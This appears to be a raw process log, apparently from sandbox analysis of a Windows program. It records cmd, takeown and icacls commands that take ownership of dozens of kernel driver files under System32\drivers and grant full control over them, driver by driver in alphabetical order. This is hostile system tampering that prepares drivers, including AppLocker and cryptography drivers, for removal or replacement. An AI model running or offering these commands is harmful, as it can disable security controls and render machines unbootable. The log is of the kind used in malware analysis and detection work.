"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpipagr.sys && icacls C:\Windows\System32\drivers\acpipagr.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpipmi.sys && icacls C:\Windows\System32\drivers\acpipmi.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\acpitime.sys && icacls C:\Windows\System32\drivers\acpitime.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\1394ohci.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Acx01000.sys && icacls C:\Windows\System32\drivers\Acx01000.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\3ware.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\AcpiDev.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\adp80xx.sys && icacls C:\Windows\System32\drivers\adp80xx.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\acpiex.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\acpi.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\3ware.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\AcpiDev.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\afd.sys && icacls C:\Windows\System32\drivers\afd.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\acpipagr.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\acpipmi.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\acpitime.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\afunix.sys && icacls C:\Windows\System32\drivers\afunix.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\Acx01000.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\Acx01000.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\acpi.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\acpiex.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\agilevpn.sys && icacls C:\Windows\System32\drivers\agilevpn.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\afd.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\acpipmi.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\acpipagr.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ahcache.sys && icacls C:\Windows\System32\drivers\ahcache.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\acpitime.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\adp80xx.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\afunix.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\afd.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdgpio2.sys && icacls C:\Windows\System32\drivers\amdgpio2.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\afunix.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\adp80xx.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\agilevpn.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdi2c.sys && icacls C:\Windows\System32\drivers\amdi2c.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ahcache.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\agilevpn.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdk8.sys && icacls C:\Windows\System32\drivers\amdk8.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\amdgpio2.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ahcache.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdppm.sys && icacls C:\Windows\System32\drivers\amdppm.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\amdgpio2.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\amdi2c.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsata.sys && icacls C:\Windows\System32\drivers\amdsata.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\amdk8.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdsbs.sys && icacls C:\Windows\System32\drivers\amdsbs.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\amdk8.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\amdi2c.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\amdppm.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\amdxata.sys && icacls C:\Windows\System32\drivers\amdxata.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\amdsata.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\appid.sys && icacls C:\Windows\System32\drivers\appid.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\applockerfltr.sys && icacls C:\Windows\System32\drivers\applockerfltr.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\amdppm.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\amdsata.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\amdsbs.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\amdxata.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\amdsbs.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\AppVStrm.sys && icacls C:\Windows\System32\drivers\AppVStrm.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\AppvVemgr.sys && icacls C:\Windows\System32\drivers\AppvVemgr.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\appid.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\amdxata.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\AppvVfs.sys && icacls C:\Windows\System32\drivers\AppvVfs.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\applockerfltr.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\AppVStrm.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\applockerfltr.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\arcsas.sys && icacls C:\Windows\System32\drivers\arcsas.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\appid.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\AppVStrm.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\AppvVemgr.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\asyncmac.sys && icacls C:\Windows\System32\drivers\asyncmac.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\AppvVfs.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\AppvVemgr.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\atapi.sys && icacls C:\Windows\System32\drivers\atapi.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\AppvVfs.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ataport.sys && icacls C:\Windows\System32\drivers\ataport.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\arcsas.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bam.sys && icacls C:\Windows\System32\drivers\bam.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\asyncmac.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\atapi.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\battc.sys && icacls C:\Windows\System32\drivers\battc.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\arcsas.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\asyncmac.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ataport.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\atapi.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bcmfn2.sys && icacls C:\Windows\System32\drivers\bcmfn2.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ataport.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\bam.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\beep.sys && icacls C:\Windows\System32\drivers\beep.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\battc.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\bam.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bindflt.sys && icacls C:\Windows\System32\drivers\bindflt.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\battc.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bowser.sys && icacls C:\Windows\System32\drivers\bowser.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\bcmfn2.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\beep.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\bindflt.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bridge.sys && icacls C:\Windows\System32\drivers\bridge.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\bowser.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BtaMPM.sys && icacls C:\Windows\System32\drivers\BtaMPM.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\beep.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\bindflt.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\bcmfn2.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BthA2dp.sys && icacls C:\Windows\System32\drivers\BthA2dp.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\bowser.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bthenum.sys && icacls C:\Windows\System32\drivers\bthenum.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BthHfEnum.sys && icacls C:\Windows\System32\drivers\BthHfEnum.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\bridge.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\BtaMPM.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BthMini.SYS && icacls C:\Windows\System32\drivers\BthMini.SYS /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\BthA2dp.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\BtaMPM.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bthmodem.sys && icacls C:\Windows\System32\drivers\bthmodem.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\bthenum.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\bridge.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bthport.sys && icacls C:\Windows\System32\drivers\bthport.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\BthHfEnum.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\BthMini.SYS
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\BthA2dp.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\BTHUSB.SYS && icacls C:\Windows\System32\drivers\BTHUSB.SYS /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\bthenum.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bttflt.sys && icacls C:\Windows\System32\drivers\bttflt.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\bthmodem.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\buttonconverter.sys && icacls C:\Windows\System32\drivers\buttonconverter.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\BthMini.SYS /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\BthHfEnum.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\bthmodem.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\bxvbda.sys && icacls C:\Windows\System32\drivers\bxvbda.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CAD.sys && icacls C:\Windows\System32\drivers\CAD.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\bthport.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cdfs.sys && icacls C:\Windows\System32\drivers\cdfs.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\BTHUSB.SYS
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\bthport.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cdrom.sys && icacls C:\Windows\System32\drivers\cdrom.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\bttflt.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\bxvbda.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CEA.sys && icacls C:\Windows\System32\drivers\CEA.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\BTHUSB.SYS /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cht4dx64.sys && icacls C:\Windows\System32\drivers\cht4dx64.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cht4sx64.sys && icacls C:\Windows\System32\drivers\cht4sx64.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\buttonconverter.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\CAD.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\cdrom.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\bttflt.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\bxvbda.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\cdfs.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cht4vfx.sys && icacls C:\Windows\System32\drivers\cht4vfx.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\CEA.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\buttonconverter.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\cdrom.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\CAD.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cht4vx64.sys && icacls C:\Windows\System32\drivers\cht4vx64.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\cdfs.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cimfs.sys && icacls C:\Windows\System32\drivers\cimfs.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\CEA.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\circlass.sys && icacls C:\Windows\System32\drivers\circlass.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\cht4dx64.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\cht4vfx.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\cht4sx64.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Classpnp.sys && icacls C:\Windows\System32\drivers\Classpnp.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\cht4vx64.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\cht4dx64.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\cht4sx64.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\cht4vfx.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cldflt.sys && icacls C:\Windows\System32\drivers\cldflt.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\cimfs.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\cht4vx64.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\clfs.sys && icacls C:\Windows\System32\drivers\clfs.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ClipSp.sys && icacls C:\Windows\System32\drivers\ClipSp.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\CmBatt.sys && icacls C:\Windows\System32\drivers\CmBatt.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\cimfs.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\cldflt.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\circlass.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\Classpnp.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cmimcext.sys && icacls C:\Windows\System32\drivers\cmimcext.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\clfs.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\Classpnp.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\cldflt.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\clfs.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cng.sys && icacls C:\Windows\System32\drivers\cng.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\circlass.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\cnghwassist.sys && icacls C:\Windows\System32\drivers\cnghwassist.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\condrv.sys && icacls C:\Windows\System32\drivers\condrv.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\CmBatt.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\ClipSp.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\crashdmp.sys && icacls C:\Windows\System32\drivers\crashdmp.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\cmimcext.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\csc.sys && icacls C:\Windows\System32\drivers\csc.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\cng.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\cnghwassist.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\ClipSp.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\CmBatt.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dam.sys && icacls C:\Windows\System32\drivers\dam.sys /grant "%username%:F" && exit
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\cmimcext.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\cng.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\cnghwassist.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\devauthe.sys && icacls C:\Windows\System32\drivers\devauthe.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dfsc.sys && icacls C:\Windows\System32\drivers\dfsc.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\condrv.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\crashdmp.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\csc.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\disk.sys && icacls C:\Windows\System32\drivers\disk.sys /grant "%username%:F" && exit
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Diskdump.sys && icacls C:\Windows\System32\drivers\Diskdump.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\dam.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\csc.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\dfsc.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\devauthe.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\condrv.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Dmpusbstor.sys && icacls C:\Windows\System32\drivers\Dmpusbstor.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\crashdmp.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\disk.sys
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\dfsc.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\devauthe.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dmvsc.sys && icacls C:\Windows\System32\drivers\dmvsc.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\dam.sys /grant "Admin:F"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\drmk.sys && icacls C:\Windows\System32\drivers\drmk.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\disk.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\Diskdump.sys
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\Dmpusbstor.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\drmkaud.sys && icacls C:\Windows\System32\drivers\drmkaud.sys /grant "%username%:F" && exit
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\dmvsc.sys
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Dumpata.sys && icacls C:\Windows\System32\drivers\Dumpata.sys /grant "%username%:F" && exit
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\Dmpusbstor.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\dmvsc.sys /grant "Admin:F"
C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\drivers\Diskdump.sys /grant "Admin:F"
C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\drivers\drmk.sys
